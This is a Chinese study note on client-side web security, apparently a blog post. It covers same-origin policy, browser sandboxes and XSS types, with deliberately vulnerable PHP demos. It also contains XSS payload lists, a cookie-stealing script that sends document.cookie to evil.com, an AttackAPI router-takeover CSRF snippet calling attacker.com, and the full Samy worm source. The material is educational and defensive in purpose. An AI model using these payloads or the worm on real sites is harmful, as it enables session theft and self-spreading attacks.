当前位置:   article > 正文

客户端脚本安全_ymzf78.top

ymzf78.top

客户端脚本安全

白帽子讲web安全

————

a.了解web安全测试的基本知识

b.掌握前端的脚本安全知识,了解基本的前端安全测试条目,如同源策略、xss攻击测试、CSRF测试、点击劫持测试

c.webinsepct nessus 绿盟扫描

preview

数据流 输入输出

浏览器安全

同源策略

同源策略是一个重要的安全策略,它用于限制一个origin的文档或者它加载的脚本如何能与另一个源的资源进行交互。它能帮助阻隔恶意文档,减少可能被攻击的媒介

Web内容的Origin源由用于访问它的URL 的方案(协议),主机(域名)和端口定义。只有当方案,主机和端口都匹配时,两个对象具有相同的起源。

某些操作仅限于同源内容,而可以使用 CORS 解除这个限制

同源的定义:如果两个 URL 的 protocol、port 和 host 都相同的话,则这两个 URL 是同源。这个方案也被称为“协议/主机/端口元组”,或者直接是 “元组”。(“元组” 是指一组项目构成的整体,双重/三重/四重/五重/等的通用形式)。

对于使用IP 地址连接到网络的计算机,端口是通信端点。端口由数字指定,低于 1024 的每个端口默认与特定协议相关联。

IP 地址是分配给连接到使用 Internet 协议的网络的每个设备的编号。

“IP 地址”通常仍指 32 位 IPv4 地址,直到更广泛地部署 IPv6。

主机(host)是一种连接到 Internet (或者一个本地网络)的设备。有一些被称作 servers (服务器)的主机可以提供额外的服务,如:提供网页、存储文件以及电子邮件。

主机不需要具有一个硬件上的实体,它可以由虚拟机产生。由虚拟机产生的主机也叫作“虚拟主机”。

例如,HTTP协议的默认端口是 80,HTTPS 协议的默认端口是 443,因此HTTP服务器等待这些端口上的请求。每个 Internet 协议都与一个默认端口相关联:SMTP (25)、POP (110)、IMAP (143)、IRC (194) 等等。

下表给出了与 URL http://store.company.com/dir/page.html 的源进行对比的示例:

URL结果原因
http://store.company.com/dir2/other.html同源只有路径不同
http://store.company.com/dir/inner/another.html同源只有路径不同
https://store.company.com/secure.html失败协议不同
http://store.company.com:81/dir/etc.html失败端口不同 ( http:// 默认端口是80)
http://news.company.com/dir/other.html失败主机不同

注意:对于当前页面,页面内存放JavaScript文件的域并不重要,重要的是加载Javascript页面所在的域是什么

# a.com
<script src=http://b.com/b.js ></script>
  • 1
  • 2

a.com加载了 b.com的b.js,b.js 运行在a.com上,于是b.js的源就应该是a.com

不受同源策略限制的:
1、页面中的链接,重定向以及表单提交是不会受到同源策略限制的。
2、跨域资源的引入是可以的。但是js不能读写加载的内容。如嵌入到页面中的<script src="..."></script>,<img>,<link>,<iframe>等。

跨域

受浏览器同源策略的影响,不是同源的脚本不能操作其他源下面的对象。想要操作另一个源下的对象是就需要跨域。

跨域的实现方式:

  • 降域document.domain
    同源策略认为域和子域属于不同的域,如:
    child1.a.com 与 a.com,
    child1.a.com 与 child2.a.com,
    xxx.child1.a.com 与 child1.a.com
    两两不同源,可以通过设置 document.damain=‘a.com’,浏览器就会认为它们都是同一个源。想要实现以上任意两个页面之间的通信,两个页面必须都设置documen.damain=‘a.com’。
    此方式的特点:

    1. 只能在父域名与子域名之间使用,且将 xxx.child1.a.com域名设置为a.com后,不能再设置成child1.a.com。
    2. 存在安全性问题,当一个站点被攻击后,另一个站点会引起安全漏洞。
    3. 这种方法只适用于 Cookie 和 iframe 窗口。
  • JSONP跨域

    JSONP的原理:(举例:a.com/jsonp.html想得到b.com/main.js中的数据)在a.com的jsonp.html里创建一个回调函数xxx,动态添加

浏览器沙箱

挂马:在网页中插入一段恶意代码,然后利用浏览器漏洞来执行任意代码。它是浏览器所面对的一种主要的威胁。

浏览器为了应对 “挂马” 威胁,从单进程架构转变为多进程架构。浏览器的多进程架构,会分开浏览器的各个功能模块。这样当一个浏览器进程崩溃时,也不会影响到其他的浏览器进程。

Chrome:包含浏览器进程、渲染进程、插件进程以及扩展进程。插件进程,比如 flash、java 等进程会与浏览器进程严格隔离:

img

渲染进程被沙箱(Sandbox)隔离,网页 web 代码内容必须通过 IPC 通道才能与浏览器内核进程通信,通信过程会进行安全的检查。

沙箱设计的目的是为了让不可信的代码运行在一定的环境中,从而限制这些代码访问隔离区之外的资源。如果因为某种原因,确实需要访问隔离区外的资源,那么就必须通过的指定的通道,这些通道会进行严格的安全检查,来判断请求的合法性。通道会采取默认拒绝的策略,一般采用封装 API 的方式来实现。

恶意网址拦截

恶意网址分为两类:

  • 挂马网站 - 黑客会在网页中插入一段恶意脚本(JavaScript 或 Flash),然后利用浏览器漏洞来执行恶意代码(shellcode)。 shellcode 是一段用于利用软件漏洞而执行的代码, shellcode 为 16 进制的机器码,因为经常让攻击者获得 shell 而得名 。shellcode 常常使用机器语言编写 。 可在暂存器 eip 溢出后,塞入一段可让 CPU 执行的 shellcode 机器码,让电脑可以执行攻击者的任意指令 。
  • 钓鱼网站和诈骗网站,也属于一种恶意网址。它是通过模仿知名网站页面来欺骗用户。
    因此,为了保护用户安全,浏览器厂商就推出了各自的拦截恶意网址功能。拦截恶意网址功能大都是基于黑名单机制来实现的。

拦截机制:

img

恶意网址拦截机制是这样的:浏览器会周期性的从服务器获取一份最新的网址黑名单,如果访问的网址存在这个黑名单中,那么浏览器就会弹出一个警告页面,形如:

img

之所以不用基于页面特征的模型来辨别恶意网址,有以下这些原因:

  1. 这种模型如果放在客户端,那么就会让攻击者分析研究这个模型,并绕过定义的安全规则。
  2. 浏览器的用户基数巨大,需要分析的数据量过于庞大。
  3. 收集用户访问过的历史记录,是一种侵犯隐私的行为。

浏览器厂商一般会与专业的安全厂商合作,由安全厂商或者组织来提供恶意网址黑名单。

PhishTank 是一个免费提供恶意网址黑名单的网站,黑名单是由志愿者提供的,更新频繁。

安全证书:主流浏览器支持EV SSL证书,以增强对安全网站的识别

跨站脚本攻击XSS

简介

跨站脚本攻击(Cross Site Script为了区别于CSS简称为XSS)指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。

反射型XSS(非持久型跨站)

把用户输入的数据反射给浏览器。诱导用户点击恶意链接,才能攻击成功

发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,服务器端解析后响应,XSS代码随响应内容一起传回给浏览器,最后浏览器解析执行XSS代码。这个过程像一次反射,故叫反射型XSS。

场景:xss.php


\\XSS反射演示
<form action="" method="get">
    <input type="text" name="xss"/>
    <input type="submit" value="test"/>
</form>
<?php
$xss = @$_GET['xss'];
if($xss!==null){
    echo $xss;
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10

如果xss中存在 HTML 结构性的内容,打印之后会直接解释为 HTML 元素。

部署好这个文件,访问http://localhost/xss.php,直接输入一个js代码,比如

img

之后点击test:

img

输出的内容直接插入到了页面中,解释为

img

反射型 XSS 的数据流向是:浏览器 -> 后端 -> 浏览器。

存储型XSS(持久型跨站)

把用户输入的数据保存到浏览器

存储型XSS和反射型XSS的差别仅在于,提交的代码会存储在服务器端(数据库,内存,文件系统等),下次请求目标页面时不用再提交XSS代码

img

最典型的例子是留言板XSS,用户提交一条包含XSS代码的留言存储到数据库,目标用户查看留言板时,那些留言的内容会从数据库查询出来并显示,浏览器发现有XSS代码,就当做正常的HTML与Js解析执行,于是触发了XSS攻击。

场景:黑客写一篇包含恶意JS的文章,所有访问该文章的用户,都会在他们的浏览器中执行这段恶意代码

xss.php,同时数据库中需要配置相应的表

\\存储XSS演示
<form action="" method="post">
    <input type="text" name="xss"/>
    <input type="submit" value="test"/>
</form>
<?php
$xss=@$_POST['xss'];
mysql_connect("localhost","root","123");
mysql_select_db("xss");
if($xss!==null){
    $sql="insert into temp(id,payload) values('1','$xss')";
    $result=mysql_query($sql);
    echo $result;
}
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14

新建show.php,内容为:

mysql_connect("localhost","root","root");
mysql_select_db("xss");
$sql="select payload from temp where id=1";
$result=mysql_query($sql);
while($row=mysql_fetch_array($result)){
   echo $row['payload'];
}
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7

该代码从数据库读取了之前插入的内容,并将其显示出来。

先创建一个数据库xss,创建temp表

img

然后访问xss.php,像之前一样输入 HTML 代码

img

点击test,点击之后却发现没有任何动静,但事实上,我们的数据已经插入到了数据库中。

img

当我们访问show.php查询这个值的时候,代码就会被执行。

img

存储型 XSS 的执行位置通常不同于输入位置。存储行 XSS 的数据流向是:

浏览器 -> 后端 -> 数据库 -> 后端 -> 浏览器。

DOM Based xss
DOM

DOM即文档对象模型,是W3C制定的标准接口规范,是一种处理HTML和XML文件的标准API。DOM提供了对整个文档的访问模型,将文档作为一个树形结构,树的每个结点表示了一个HTML标签或标签内的文本项。DOM树结构精确地描述了HTML文档中标签间的相互关联性。将HTML或XML文档转化为DOM树的过程称为解析(parse)。HTML文档被解析后,转化为DOM树,因此对HTML文档的处理可以通过对DOM树的操作实现。DOM模型不仅描述了文档的结构,还定义了结点对象的行为,利用对象的方法和属性,可以方便地访问、修改、添加和删除DOM树的结点和内容 [1] 。

API (web 或 XML 页面) = DOM + JS (脚本语言)

  • DOM树扩展

    DOM树结点的属性包括标记名(nodeName)、结点类型(node Type,取值为TagTxt)、结点内容(data)、父结点对象集合(parent Node)、子结点对象集合(firstChild,lastChild)、兄弟结点对象集合(previous Sibling,nextSibling)等。对DOM树扩展的总体思路为:考虑HTML页面标签的类别,以及标签属性值对页面主题信息的影响,将这种影响纳入对页面内容要素的计算中,对DOM树结点进行语义扩展,同时引入结点影响度因子来刻画该结点在树中的重要程度。

  • DOM树结点语义扩展

    为了增加DOM树结点与页面主题信息相关程度的语义信息,计算结点内容的重要度,将HTML标签的类别(Category)、非链接文字数(WordNum)、超链接数(LinkNum)、属性集(Attibution)和影响度因子(Influence)等属性添加到结点中,扩展其语义。HTML标签依据其作用可分为5类:

    • 描述标题及页面概要信息的标签:如〈title〉、〈meta〉等。
    • 规划网页布局的标签:如〈table〉、〈tr〉、〈td〉、〈p〉、〈div〉等,其作用是描述网页内容的布局结构。
    • 描述显示特点的标签:如〈b〉、〈I〉、〈strong〉、〈h1〉-〈h6〉等,其作用是强调重点内容,引起人们注意。
    • 超链接相关的标签,表示网页间的内容相关性信息。
    • 其他标签,如设置图像的标签〈img〉,在文本提取时将忽略这类标签。

    根据HTML标签在刻画网页特征时的语义功能,将DOM树结点分为6种类别:标题类(TITLE)、正文类(CONTENT)、视觉类(VISION)、分块类(BLOCK)、超链类(LINK)和其他类(OTHER),不同类的结点对Web信息提取的重要度不同。

    • 标题类(TITLE):指HTML文档中标题标签的专有类别。
    • 正文类(CONTENT):指包含网页正文内容的标签类别,如包含文字的〈td〉标签。
    • 视觉类(VISION):指描述页面显示特性的标签类别,如〈b〉、〈strong〉等。
    • 分块类(BLOCK):指用于网页内容分块的标签类别,如〈table〉、〈tr〉等。
    • 超链类(LINK):指包含超链接的标签类别,如〈a〉。
    • 其他类(OTHER):指不属于以上5种类别的标签类型。

    以上6类结点对页面主题的重要度依次降低。

    HTML DOM 树形结构:

    DOM HTML tree

    DOM对象模型的四个基本接口

在DOM对象模型接口规范中,有四个基本的接口:Document,Node,NodeList以及NamedNodeMap。在这四个基本接口中,Document接口是对文档进行操作的入口,它是从Node接口继承过来的。Node接口是其他大多数接口的父类,象Documet,Element,Attribute,Text,Comment等接口都是从Node接口继承过来的。NodeList接口是一个节点的集合,它包含了某个节点中的所有子节点。NamedNodeMap接口也是一个节点的集合,通过该接口,可以建立节点名和节点之间的一一映射关系,从而利用节点名可以直接访问特定的节点。

1.Document接口

Document接口代表了整个XML/HTML文档*,因此,它是整棵文档树的根,提供了对文档中的数据进行访问和操作的入口。Document节点是DOM树中的根节点,也即对XML文档进行操作的入口节点。通过Docuemt节点,可以访问到文档中的其他节点,如处理指令、注释、文档类型以及XML文档的根元素节点等等。另外,从上图我们还可以看出,在一棵DOM树中,Document节点可以包含多个处理指令、多个注释作为其子节点,而文档类型节点和XML文档根元素节点都是唯一的。

Document接口同其他接口之间的关系

2.Node接口

DOM对象模型接口中有很大一部分接口是从Node接口继承过来的,例如,Element、Attr、CDATASection等接口,都是从Node继承过来的。在DOM树中,Node接口代表了树中的一个节点。一个典型的Node接口如下图所示:

典型的Node接口

3.NodeList接口

NodeList接口提供了对节点集合的抽象定义,它并不包含如何实现这个节点集的定义。**NodeList用于表示有顺序关系的一组节点,比如某个节点的子节点序列。**另外,它还出现在一些方法的返回值中,例如GetNodeByName。

在DOM对象模型中,NodeList的对象是"live"的,换句话说,**对文档的改变,会直接反映到相关的NodeList对象中。**例如,如果通过DOM获得一个NodeList对象,该对象中包含了某个Element节点的所有子节点的集合,那么,当再通过DOM对Element节点进行操作(添加、删除、改动节点中的子节点)时,这些改变将会自动地反映到NodeList对象中,而不需DOM对象模型应用程序再做其他额外的操作。

NodeList中的每个item都可以通过一个索引来访问,该索引值从0开始。

4.NamedNodeMap接口

实现了NamedNodeMap接口的对象中包含了可以通过名字来访问的一组节点的集合。不过注意,NamedNodeMap并不是从NodeList继承过来的,它所包含的节点集中的节点是无序的。尽管这些节点也可以通过索引来进行访问,但这只是提供了枚举NamedNodeMap中所包含节点的一种简单方法,并不表明在DOM对象模型规范中为NamedNodeMap中的节点规定了一种排列顺序。

NamedNodeMap表示的是**一组节点和其唯一名字的一一对应关系,**这个接口主要用在属性节点的表示上。
与NodeList相同,在DOM中,NamedNodeMap对象也是"live"的。

DOM Based XSS

通过修改页面的DOM节点形成的XSS, DOM(document object model文档对象模型),客户端脚本处理逻辑导致的安全问题。

DOM XSS和反射型XSS、存储型XSS的差别在于DOM XSS的代码并不需要服务器参与,触发XSS靠的是浏览器端的DOM解析,完全是客户端的事情。

把xss.php内容改为

<?php
error_reporting(0); //禁用错误报告
$name = $_GET["name"];
?>
<input id="text" type="text" value="<?php echo $name;?>" />

<div id="print"></div>
<script type="text/javascript">
var text = document.getElementById("text"); 
var print = document.getElementById("print");
print.innerHTML = text.value; // 获取 text的值,并且输出在print内。这里是导致xss的主要原因。
</script>

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
img

DOM-XSS 的数据流向是:URL–>浏览器

总结: 在易用上,存储型XSS > DOM - XSS > 反射型 XSS。

注:反射型xss和dom-xss都需要在url加入js代码才能够触发。

XSS攻击

XSS Payload

xss攻击成功后,攻击者对用户当前浏览器页面植入恶意脚本。这些恶意脚本,被称为 XSS Payload

XSS Payload 实际就是JavaScript脚本

常用payload
  • Script标签:
<script>alert(/1/)</script>
<script>prompt(1)</script> 
<script>confirm(1)</script>
<script src="http://attacker.org/malicious.js"></script>
<script src=data:text/javascript,alert(1)></script>
<script>setTimeout(alert(1),0)</script>
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • img标签

    <img src=x onerror=alert(1)>
    <img src=x onerror=prompt(1);>
    <img src=javascript:alert('1')>
    
    
    • 1
    • 2
    • 3
    • 4
  • a 标签

    <a href=”javascript:alert(1)”>点击触发</a>
    <a href="http://www.hacker.com">点击触发</a>
    
    • 1
    • 2

    iframe标签

    <iframe src="javascript:alert(1)">
    <iframe onload=alert(1)>
    
    • 1
    • 2

    其他标签:

    <video src=x onerror=prompt(1);>
    <audio src=x onerror=prompt(1);>
    
    • 1
    • 2

    常用事件:
    onclick: 点击触发 (<img src=x onclick=alert(1)>)
    onerror: 当 src 加载不出来时触发 (<img src=x onerror=alert(1)>)
    onload: 当 src 加载完毕触发(<img src=x onload=alert(1)>)
    onmouseover:鼠标指针移动到图片后触发(<img src=x onmouseover=alert(1)>)
    onmousemove: 鼠标指针移到指定的元素后触发(<img src=x onmousemove=alert(1) >)
    onfocus: 当 input 输入框获取焦点时触发(<input onfocus=javascript:alert(1) autofocus>)

    常用属性:
    src
    action
    href
    data
    content

    javascript弹窗函数:
    alert()
    confirm()
    prompt()

Cookie 劫持

读取浏览器的cookie对象

  • 攻击

​ 1. 黑客加载远程脚本

http://www.a.com/test.htm?abc="><script src=http://www.evil.com/evil.js ></script>
  • 1

XSS Payload 写在远程脚本evil.js

var img = document.createElement("img");
img.src ="http://www.evil.com/log?"+escape(document.cookie);
document.body.appendChild(img);
  • 1
  • 2
  • 3

在页面中插入看不见的图片,把document.cookie作为对象发送到远程服务器

​ 2. 用户登入时,不小心点击这个链接时,则会把自身的cookie信息, 投递给http://www.evil.com

  • 防范

    1.给Cookie添加HttpOnly属性, 这种属性设置后, 只能在http请求中传递, 在脚本中,document.cookie无法获取到该Cookie值

    2.**在cookie中添加校验信息, 这个校验信息和当前用户外置环境有些关系,比如ip,user agent等有关.**这样当cookie被人劫持了, 并冒用, 但是在服务器端校验的时候, 发现校验值发生了变化, 因此要求重新登录

    3.cookie中session id的定时更换, 让session id按一定频率变换, 同时对用户而言, 该操作是透明的, 这样保证了服务体验的一致性.

Session是另一种记录客户状态的机制,不同的是Cookie保存在客户端浏览器中,而Session保存在服务器上。客户端浏览器访问服务器的时候,服务器把客户端信息以某种形式记录在服务器上。这就是Session。客户端浏览器再次访问时只需要从该Session中查找该客户的状态就可以了。

如果说Cookie机制是通过检查客户身上的“通行证”来确定客户身份的话,那么Session机制就是通过检查服务器上的“客户明细表”来确认客户身份。Session相当于程序在服务器上建立的一份客户档案,客户来访的时候只需要查询客户档案表就可以了。

浏览器第一次访问服务器会在服务器端生成一个 session,有一个 sessionID 和它对应,并返回给浏览器,这个 sessionID 会被保存在浏览器的会话 cookie 中

客户端只保存 sessionID 到 cookie 中,而不会保存 session。session 不会因为浏览器的关闭而删除,只能通过程序调用 HttpSession.invalidate() 或超时才能销毁。

构造 GET&POST请求

一个网站的应用,只需要接受HTTP协议的 GET&POST请求,即可完成所有操作。攻击者可以通过JavaScript脚本,让浏览器发起这两种请求。

  • GET

    场景:删除文章

    正常删除链接:http://blog.sohu.com/manage/enter.do?m=delete&id=156713012

    • 发起GET请求

      image-20211015112321099
    • **诱使?**文章作者执行JavaScript代码

  • POST

    正常发出一条消息,浏览器会发出form表单

    • 构造form表单,自动提交

      image-20211015112830248
    • 通过XMLHttpRequest 发送post请求

      image-20211015113216524 image-20211015113242540
  • XSS钓鱼

场景:获取密码

利用Javascript在当前页面画出伪造的登录框,用户输入后,密码被发送到攻击者的服务器

  • 识别用户浏览器

    通过XSS读取userAgent对象:alert(navigator.userAgent);

    或者根据浏览器独有的对象分辨浏览器的差异,判断浏览器版本

    image-20211015114428016
  • 识别用户安装的浏览器

    收集创建软件的classid,扫描用户电脑中的软件列表

    classID:(类标识符)也称为CLASSID或CLSID,是与某一个类对象相联系的唯一标记(UUID)。一个准备创建多个对象的类对象应将其CLSID注册到系统注册数据库的任务表中,以使客户能够定位并装载与该对象有关的可执行代码。

    常用文件标识符

    我的电脑 {20D04FE0-3AEA-1069-A2D8-08002B30309D}

    我的文档 {450D8FBA-AD25-11D0-98A8-0800361B1103}

    拨号网络 {992CFFA0-F557-101A-88EC-00DD010CCC48}

    控制面板 {21EC2020-3AEA-1069-A2DD-08002B30309D}

    计划任务 {D6277990-4C6A-11CF-8D87-00AA0060F5BF}

    打印机 {2227A280-3AEA-1069-A2DE-08002B30309D}

    记事本 {1FBA04EE-3024-11D2-8F1F-0000F87ABD16}

    网络邻居 {208D2C60-3AEA-1069-A2D7-08002B30309D}

    回收站 {645FF040-5081-101B-9F08-00AA002F954E}

  • 获取用户真实IP

    用户电脑使用代理服务器,网站上看到的客户端地址是内网的出口IP地址。

    JavaScript本身没有提供获取本地IP地址的能力,但是可以通过调用第三方的接口如Java applet,获取ip地址

    image-20211015141512960
XSS攻击平台

将XSS payload 功能封装起来,成为XSS攻击平台,方便演示以及渗透测试使用。

  • Attack API

    • 注入attackApi代码

      在有XSS漏洞的地方插入以下代码:

      <script src=”[你的载体网站域名]/ attackapi/AttackAPI-standalone.js"></script>”//加载AttackApi库的全部JS代码

      或者只加载要用到的JS代码,这样传输的js文件会小很多

      <script src=”[你的载体网站域名]/ attackapi/lib/dom/requestCSRF.js"></script>”//加载AttackApi库的requestCSRF代码

    • 写自己的攻击代码

      比如获取用户的Cookie,UA

      var c=$A.getCookies();

      var ua=$A.getAgent();

      AttackAPI.dom.getAgent= function () {
      
      var agent = '';
      
      if (navigator.userAgent)
                 agent = navigator.userAgent;
      else if (navigator.vendor)
                 agent = navigator.vendor;
      else if (window.opera)
                 agent = 'opera';
      
      agent = agent.toLowerCase();
      if (/webkit/.test(agent))
                 return 'safari';
      else if (/opera/.test(agent))
                 return 'opera';
      else if (/msie/.test(agent) &&!/opera/.test(agent))
                 return 'msie';
      else if (/mozilla/.test(agent) &&!/(compatible|webkit)/.test(agent))
                 return 'mozilla';
      else
                 return null;
      
      };
      
      • 1
      • 2
      • 3
      • 4
      • 5
      • 6
      • 7
      • 8
      • 9
      • 10
      • 11
      • 12
      • 13
      • 14
      • 15
      • 16
      • 17
      • 18
      • 19
      • 20
      • 21
      • 22
      • 23
      • 24

      构造一个CSRF请求

      $A.requestCSRF({url:”[你的CSRF请求URL]”});

      $A.requestCSRF({
      method:POSTurl: (‘http://admin:admin@’+ $A.getInternalIP() ).replace(/.d+$/,.1) +/setup.cgi’,
      query: {
      remote_management: ‘enable’,
      sysPasswd: ‘abc123’,
      sysConfi rmPasswd: ‘abc123’
      },
      onload: function () {
      $A.requestIMG(‘http://attacker.com/confi rm_compromised.php’);
      }
      });
      
      • 1
      • 2
      • 3
      • 4
      • 5
      • 6
      • 7
      • 8
      • 9
      • 10
      • 11
      • 12
      • 13
    • 控制用户的浏览器

      AttackApi有一个zombie模块,黑客向服务器发送消息,而受害者的浏览器定时去向服务器取消息,即可实现黑客操作受害者的浏览器。

  • BeEF

    BeEF,全称The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具

    主页:http://beefproject.com

    image-20211015155130468

    xss攻击演示平台

  • XSS-Proxy

    通过嵌套iframe的方式实时远程控制被攻击的浏览器

XSS worm

跨站脚本蠕虫(XSS Worm),实质上是一段脚本程序,通 常用 JavaScript或Vbscript写成,在用户浏览XSS页面时被激活。蠕虫利用 站点页面的XSS漏洞根据其特定规则进行传播和感染。

蠕虫攻击流程

1、攻击者发现目标网站存在XSS漏洞,并且可以编写XSS蠕虫。

2、利用一个宿主(如博客空间)作为传播源头进行XSS攻击。

3、当其他用户访问被感染的空间时,XSS蠕虫执行以下操作。

• 判断用户是否登录,如果已登录就执行下一步;如果没登录则执行其他 操作。

• 继续判断该用户是否被感染,如果没有就将其感染;如果已感染则跳过。

  • samy worm

    • MySpace 过滤了很多危险的HTML 标签,只保留了标签、标签、

      标签等"安全的标签"。所有的事件比如" onclick" 等也被过滤了。但是MySpace 却允许用户控制标签的style 属性,通过style ,还是有办法构造出XSS 的。比如:

      <div style-"background:url('javascript:alert(l) ')">
      
      • 1
    • Myspace也过滤了“JavaScript”、“onreadystatechange"(XML-HTTP请求中必须)等敏感词,所以samy用了拆分法绕过这些限制…由于一些浏览器自动会把"java\nscript"(java和script间是换行符)当作"javascript" ,因此可以饶过这个问题

      <div id="mycode" expr="alert('hah!')" style="background:url('java script:eval(document.all.mycode.expr)')">
      
      • 1

      为了能把这些代码放到浏览的用户的profile中,我们需要得到这个页面的源码。为了取得页面的源码,我们可以使用document.body.innerHTML,只需要取得访问此页面用户的ID即可。 Myspace 又一次考虑到了这些,他们在所有的地方都过滤了"innerHTML"。 为了饶过这个限制,我们使用eval() 把两个字符串拼成"innerHTML"。如:
      alert(eval('document.body.inne' + 'rHTML'));

      eval('xmlhttp.onread' + 'ystatechange = callback');

    • 最后,通过ajax构造的post请求,完成用户添加自己名字的功能,同时复制蠕虫自身进行传播

      <div id=mycode style="BACKGROUND: url('java script:eval(document.all.mycode.expr)')" 
      	expr="var B=String.fromCharCode(34);
          var A=String.fromCharCode(39);
          
          function g()
          {
              var C;
              try
              {
                  var D=document.body.createTextRange();
                  C=D.htmlText
              }
              catch(e){}
              if(C)
              {
                  return C
              }
              else
              {
                  return eval('document.body.inne'+'rHTML')
              }
          }
          function getData(AU)
          {
              M=getFromURL(AU,'friendID');
              L=getFromURL(AU,'Mytoken')
          }
          function getQueryParams()
          {
              var E=document.location.search;
              var F=E.substring(1,E.length).split('&');
              var AS=new Array();
              for(var O=0;O<F.length;O++)
              {
                  var I=F[O].split('=');
                  AS[I[0]]=I[1]
              }
              return AS
          }
          var J;
          var AS=getQueryParams();
          var L=AS['Mytoken'];
          var M=AS['friendID'];
          if(location.hostname=='profile.myspace.com')
          {
              document.location='http://www.myspace.com'+location.pathname+location.search
          }
          else
          {
              if(!M)
              {
                  getData(g())
              }
              main()
          }
          function getClientFID()
          {
              return findIn(g(),'up_launchIC( '+A,A)
          }
          function nothing() {}
          function paramsToString(AV)
          {
              var N=new String();
              var O=0;
              for(var P in AV)
              {
                  if(O>0)
                  {
                      N+='&'
                  }
                  var Q=escape(AV[P]);
                  while(Q.indexOf('+')!=-1)
                  {
                      Q=Q.replace('+','%2B')
                  }
                  while(Q.indexOf('&')!=-1)
                  {
                      Q=Q.replace('&','%26')
                  }
                  N+=P+'='+Q;
                  O++
              }
              return N
          }
          function httpSend(BH,BI,BJ,BK)
          {
              if(!J)
              {return false}
              eval('J.onr'+'eadystatechange=BI');
              J.open(BJ,BH,true);
              if(BJ=='POST')
              {
                  J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
                  J.setRequestHeader('Content-Length',BK.length)
              }
              J.send(BK);
              return true
          }
          function findIn(BF,BB,BC)
          {
              var R=BF.indexOf(BB)+BB.length;
              var S=BF.substring(R,R+1024);
              return S.substring(0,S.indexOf(BC))
          }
          function getHiddenParameter(BF,BG)
          {
              return findIn(BF,'name='+B+BG+B+' value='+B,B)
          }
          function getFromURL(BF,BG)
          {    
              var T;
              if(BG=='Mytoken')
              {T=B}
              else
              {T='&'}
              var U=BG+'=';
              var V=BF.indexOf(U)+U.length;
              var W=BF.substring(V,V+1024);
              var X=W.indexOf(T);
              var Y=W.substring(0,X);
              return Y
          }
          function getXMLObj()
          {
              var Z=false;
              if(window.XMLHttpRequest)
              {
                  try
                  {
                      Z=new XMLHttpRequest()
                  }
                  catch(e)
                  {Z=false}
              }
              else if(window.ActiveXObject)
              {
                  try{
                      Z=new ActiveXObject('Msxml2.XMLHTTP')
                  }
                  catch(e)
                  {
                      try
                      {
                          Z=new ActiveXObject('Microsoft.XMLHTTP')
                      }
                      catch(e)
                      {
                          Z=false
                      }
                  }
              }
              return Z
          }
          var AA=g();
          var AB=AA.indexOf('m'+'ycode');
          var AC=AA.substring(AB,AB+4096);
          var AD=AC.indexOf('D'+'IV');
          var AE=AC.substring(0,AD);
          var AF;
          if(AE)
          {
              AE=AE.replace('jav'+'a',A+'jav'+'a');
              AE=AE.replace('exp'+'r)','exp'+'r)'+A);
              AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'
          }
          var AG;
          function getHome()
          {
              if(J.readyState!=4)
              {return}
              var AU=J.responseText;
              AG=findIn(AU,'P'+'rofileHeroes','</td>');
              AG=AG.substring(61,AG.length);
              if(AG.indexOf('samy')==-1)
              {
                  if(AF)
                  {
                      AG+=AF;
                      var AR=getFromURL(AU,'Mytoken');
                      var AS=new Array();
                      AS['interestLabel']='heroes';
                      AS['submit']='Preview';
                      AS['interest']=AG;
                      J=getXMLObj();
                      httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))
                  }
              }
          }
          function postHero()
          {
              if(J.readyState!=4)
              {return}
              var AU=J.responseText;
              var AR=getFromURL(AU,'Mytoken');
              var AS=new Array();AS['interestLabel']='heroes';
              AS['submit']='Submit';
              AS['interest']=AG;
              AS['hash']=getHiddenParameter(AU,'hash');
              httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))
          }
          function main()
          {
              var AN=getClientFID();
              var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;
              J=getXMLObj();
              httpSend(BH,getHome,'GET');
              xmlhttp2=getXMLObj();
              httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')
          }
          function processxForm()
          {
              if(xmlhttp2.readyState!=4)
              {return}
              var AU=xmlhttp2.responseText;
              var AQ=getHiddenParameter(AU,'hashcode');
              var AR=getFromURL(AU,'Mytoken');
              var AS=new Array();
              AS['hashcode']=AQ;
              AS['friendID']='11851658';
              AS['submit']='Add to Friends';
              httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))
          }
          function httpSend2(BH,BI,BJ,BK)
          {
              if(!xmlhttp2)
              {
              return false}eval('xmlhttp2.onr'+'eadystatechange=BI');
              xmlhttp2.open(BJ,BH,true);
              if(BJ=='POST')
              {
                  xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
                  xmlhttp2.setRequestHeader('Content-Length',BK.length)
              }
              
              xmlhttp2.send(BK);
              return true
          } "></DIV>
      
      
      • 1
      • 2
      • 3
      • 4
      • 5
      • 6
      • 7
      • 8
      • 9
      • 10
      • 11
      • 12
      • 13
      • 14
      • 15
      • 16
      • 17
      • 18
      • 19
      • 20
      • 21
      • 22
      • 23
      • 24
      • 25
      • 26
      • 27
      • 28
      • 29
      • 30
      • 31
      • 32
      • 33
      • 34
      • 35
      • 36
      • 37
      • 38
      • 39
      • 40
      • 41
      • 42
      • 43
      • 44
      • 45
      • 46
      • 47
      • 48
      • 49
      • 50
      • 51
      • 52
      • 53
      • 54
      • 55
      • 56
      • 57
      • 58
      • 59
      • 60
      • 61
      • 62
      • 63
      • 64
      • 65
      • 66
      • 67
      • 68
      • 69
      • 70
      • 71
      • 72
      • 73
      • 74
      • 75
      • 76
      • 77
      • 78
      • 79
      • 80
